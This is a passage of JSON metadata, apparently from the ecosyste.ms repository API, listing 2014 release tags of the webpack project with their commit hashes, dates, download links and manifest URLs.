-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack